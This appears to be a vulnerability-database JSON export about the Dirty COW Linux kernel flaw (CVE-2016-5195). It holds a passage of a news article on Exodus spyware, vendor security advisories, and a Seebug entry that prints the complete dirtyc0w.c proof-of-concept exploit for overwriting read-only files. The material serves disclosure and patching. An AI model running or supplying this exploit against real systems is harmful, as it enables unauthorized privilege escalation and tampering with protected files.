the official Google Play Store. \n \nDubbed **Exodus**, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year. \n \nUnlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. \n\n\n \nSince Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. 
\n \n\n\n> \"Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,\" the researchers say in a [blog post](<https://blog.lookout.com/esurv-research>). \n \n\"All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.\"\n\n \nThough the iOS variant is less sophisticated than its Android counterpart, the spyware is still able to exfiltrate information from targeted iPhone devices including contacts, audio recordings, photos, videos, GPS location, and device information. \n \nThe stolen data is then transmitted via HTTP PUT requests to an endpoint on the attacker-controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. \n\n\n[](<https://1.bp.blogspot.com/-bbiYR-lAE7Y/XKw-4K1NxFI/AAAAAAAAztY/7pLITJjk3Tg_hA18skRD3OG-OLKlQmsOwCLcBGAs/s728-e100/ios-malware-apple-enterprise-developer-program.png>)\n\n \nSeveral technical details indicated that Exodus was \"likely the product of a well-funded development effort\" and aimed to target the government or law-enforcement sectors. \n \n\n\n> \"These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,\" the researchers say.\n\n \nDeveloped by an Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders [discovered](<https://securitywithoutborders.org/blog/2019/03/29/exodus.html>) nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. \n \nUnder development for at least five years, Exodus for Android usually consists of three distinct stages. 
First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. \n\n\n \nThe second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. \n \nFinally, the third stage uses the infamous [DirtyCOW](<https://thehackernews.com/2017/09/dirty-cow-android-malware.html>) exploit ([CVE-2016-5195](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>)) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. \n \nThe Android variant is also designed to keep running on the infected device even when the screen is switched off. \n \nWhile the Android version of Exodus had potentially infected \"several hundreds if not a thousand or more\" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. \n \nAfter being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. \n \nThis is the second instance in the past year when an Italian software company has been caught distributing spyware. 
Earlier last year, another undisclosed Italian firm was found distributing \"**Skygofree**,\" a [dangerous Android spying tool](<https://thehackernews.com/2018/01/android-spying-malware.html>) that gives hackers full control of infected devices remotely.\n", "modified": "2019-04-09T07:19:48", "published": "2019-04-09T07:19:00", "id": "THN:6681D64EFC53E13356AF1184CE1D6024", "href": "https://thehackernews.com/2019/04/exodus-ios-malware.html", "type": "thn", "title": "'Exodus' Surveillance Malware Found Targeting Apple iOS Users", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:03:04", "description": "### Summary\r\n\r\n\r\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.\r\n\r\nThe bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.\r\n\r\nProof-of-concept code is available [here](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs).\r\n\r\n### Video Explanation\r\n\r\n\r\n\r\n[link](https://www.youtube.com/watch?v=kEsshExn7aE)\r\n\r\n### Impact\r\n\r\n\r\n* An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\r\n* This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\r\n\r\n### Analysis\r\n \r\n\r\n```\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_cow_fault <- FAULT_FLAG_WRITE\r\n alloc_set_pte\r\n maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty\r\n but keep it RO \r\n# Returns with 0 and retry\r\nfollow_page_mask\r\n follow_page_pte\r\n 
(flags & FOLL_WRITE) && !pte_write(pte) <- retry fault\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n FAULT_FLAG_WRITE && !pte_write\r\n do_wp_page\r\n PageAnon() <- this is CoWed page already\r\n reuse_swap_page <- page is exclusively ours\r\n wp_page_reuse\r\n maybe_mkwrite <- dirty but RO again\r\n ret = VM_FAULT_WRITE\r\n((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE\r\n\r\n#Returns with 0 and retry as a read fault\r\ncond_resched -> different thread will now unmap via madvise\r\nfollow_page_mask\r\n !pte_present && pte_none\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_read_fault <- this is a read fault and we will get pagecache\r\n page!\r\n```\r\n\r\n### How\r\n\r\n\r\n* The in-the-wild exploit relied on writing to /proc/self/mem on one side of the race.\r\n* ptrace(PTRACE_POKEDATA) can write to read-only mappings.\r\n* The attack relies on racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.\r\n\r\n### Commit messages\r\n\r\n\r\n commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6\r\n Author: Linus Torvalds <torvalds@g5.osdl.org>\r\n Date: Mon Aug 1 11:14:49 2005 -0700\r\n\r\n Fix get_user_pages() race for write access\r\n\r\n There's no real guarantee that handle_mm_fault() will always be able to\r\n break a COW situation - if an update from another thread ends up\r\n modifying the page table some way, handle_mm_fault() may end up\r\n requiring us to re-try the operation.\r\n\r\n That's normally fine, but get_user_pages() ended up re-trying it as a\r\n read, and thus a write access could in theory end up losing the dirty\r\n bit or be done on a page that had not been properly COW'ed.\r\n\r\n This makes get_user_pages() always retry write accesses as write\r\n accesses by making \"follow_page()\" require that a writable follow has\r\n the dirty bit set. 
That simplifies the code and solves the race: if the\r\n COW break fails for some reason, we'll just loop around and try again.\r\n\r\n\r\n\r\n commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\r\n Author: Linus Torvalds <torvalds@linux-foundation.org>\r\n Date: Thu Oct 13 20:07:36 2016 GMT\r\n\r\n This is an ancient bug that was actually attempted to be fixed once\r\n (badly) by me eleven years ago in commit 4ceb5db9757a (\"Fix\r\n get_user_pages() race for write access\") but that was then undone due to\r\n problems on s390 by commit f33ea7f404e5 (\"fix get_user_pages bug\").\r\n\r\n In the meantime, the s390 situation has long been fixed, and we can now\r\n fix it by checking the pte_dirty() bit properly (and do it better). The\r\n s390 dirty bit was implemented in abf09bed3cce (\"s390/mm: implement\r\n software dirty bits\") which made it into v3.9. Earlier kernels will\r\n have to look at the page state itself.\r\n\r\n Also, the VM has become more scalable, and what used a purely\r\n theoretical race back then has become easier to trigger.\r\n\r\n To fix it, we introduce a new internal FOLL_COW flag to mark the \"yes,\r\n we already did a COW\" rather than play racy games with FOLL_WRITE that\r\n is very fundamental, and then use the pte dirty flag to validate that\r\n the FOLL_COW flag is still valid.\r\n\r\n### References\r\n\r\nhttps://dirtycow.ninja \r\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344 \r\nhttps://access.redhat.com/security/vulnerabilities/2706661\r\nhttps://plus.google.com/+KeesCook/posts/UUaXm3PcQ4n\r\nhttps://twitter.com/nelhage/status/789196293629370368\r\nhttps://bugzilla.suse.com/show_bug.cgi?id=1004418#c14", "published": "2016-10-22T00:00:00", "type": "seebug", "title": "Linux kernel 2.6.22 < 3.9 elevation of privilege vulnerability\n(Dirty COW)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-92488", "id": "SSV:92488", "sourceData": "\n \r\n/*\r\n####################### dirtyc0w.c #######################\r\n\r\n# For more details see: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\r\n\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -pthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n\r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n /* thread routine must return a value */\r\n return NULL;\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n 
lseek(f,(uintptr_t) map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n /* thread routine must return a value */\r\n return NULL;\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3) {\r\n (void)fprintf(stderr, \"%s\\n\",\r\n \"usage: dirtyc0w target_file new_content\");\r\n return 1; }\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %zx\\n\\n\",(uintptr_t) map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92488"}], "cisco": [{"lastseen": "2020-12-24T11:40:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability in the memory manager functions of the Linux Kernel could allow unauthenticated, local attackers to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nThe vulnerability is due to a race condition in the memory manager functions of the Linux Kernel. 
An attacker could exploit this vulnerability by racing the madvise (MADV_DONTNEED) system call. An exploit could allow the attacker to gain write access to otherwise read-only memory mappings. A local user could modify on-disk binaries, bypassing the standard permission mechanisms.\n\nOn October 19, 2016, a new vulnerability related to a race condition in the memory manager of the Linux Kernel was disclosed. This vulnerability could allow unprivileged, local users to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nCisco has released software updates that address this vulnerability. For information about affected and fixed software releases, consult the Cisco bug IDs in the Vulnerable Products table.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux\"]", "modified": "2018-08-16T13:48:18", "published": "2016-10-26T15:00:00", "id": "CISCO-SA-20161026-LINUX", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "type": "cisco", "title": "Vulnerability in Linux Kernel Affecting Cisco Products: October 2016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:01:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "", "edition": 1, "modified": 
"2017-05-31T00:00:00", "published": "2016-12-07T00:00:00", "id": "HUAWEI-SA-20161207-01-DIRTYCOW", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20161207-01-dirtycow-en", "title": "Security Advisory - Dirty COW Vulnerability in Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-18T01:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-2", "href": "https://ubuntu.com/security/notices/USN-3106-2", "title": "Linux kernel (Xenial HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. 
A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-3", "href": "https://ubuntu.com/security/notices/USN-3106-3", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-1", "href": "https://ubuntu.com/security/notices/USN-3105-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:41:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-2", "href": "https://ubuntu.com/security/notices/USN-3104-2", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. 
A local attacker could use this to gain administrative \nprivileges.", "edition": 5, "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "USN-3107-2", "href": "https://ubuntu.com/security/notices/USN-3107-2", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:44:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "USN-3105-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-2", "href": "https://ubuntu.com/security/notices/USN-3105-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:43:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. 
A local attacker could use this to gain administrative \nprivileges.", "edition": 5, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3107-1", "href": "https://ubuntu.com/security/notices/USN-3107-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:47:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-4", "href": "https://ubuntu.com/security/notices/USN-3106-4", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "Arch Linux Security Advisory ASA-201610-11\n==========================================\n\nSeverity: High\nDate : 2016-10-21\nCVE-ID : CVE-2016-5195\nPackage : linux-lts\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-lts before version 4.4.26-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.4.26-1.\n\n# pacman -Syu \"linux-lts>=4.4.26-1\"\n\nThe problem has been fixed upstream in version 4.4.26.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. 
An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.\n\nImpact\n======\n\nAn unprivileged local attacker is able to elevate their privileges on\nthe system and gain root access.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\nhttps://access.redhat.com/security/cve/CVE-2016-5195", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ASA-201610-11", "href": "https://security.archlinux.org/ASA-201610-11", "type": "archlinux", "title": "[ASA-201610-11] linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:00", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2105\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034172.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2105.html", "edition": 3, "modified": "2016-10-26T07:33:13", "published": "2016-10-26T07:33:13", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034172.html", "id": "CESA-2016:2105", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2098\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034171.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2098.html", "edition": 3, "modified": "2016-10-25T11:17:10", "published": "2016-10-25T11:17:10", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034171.html", "id": "CESA-2016:2098", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}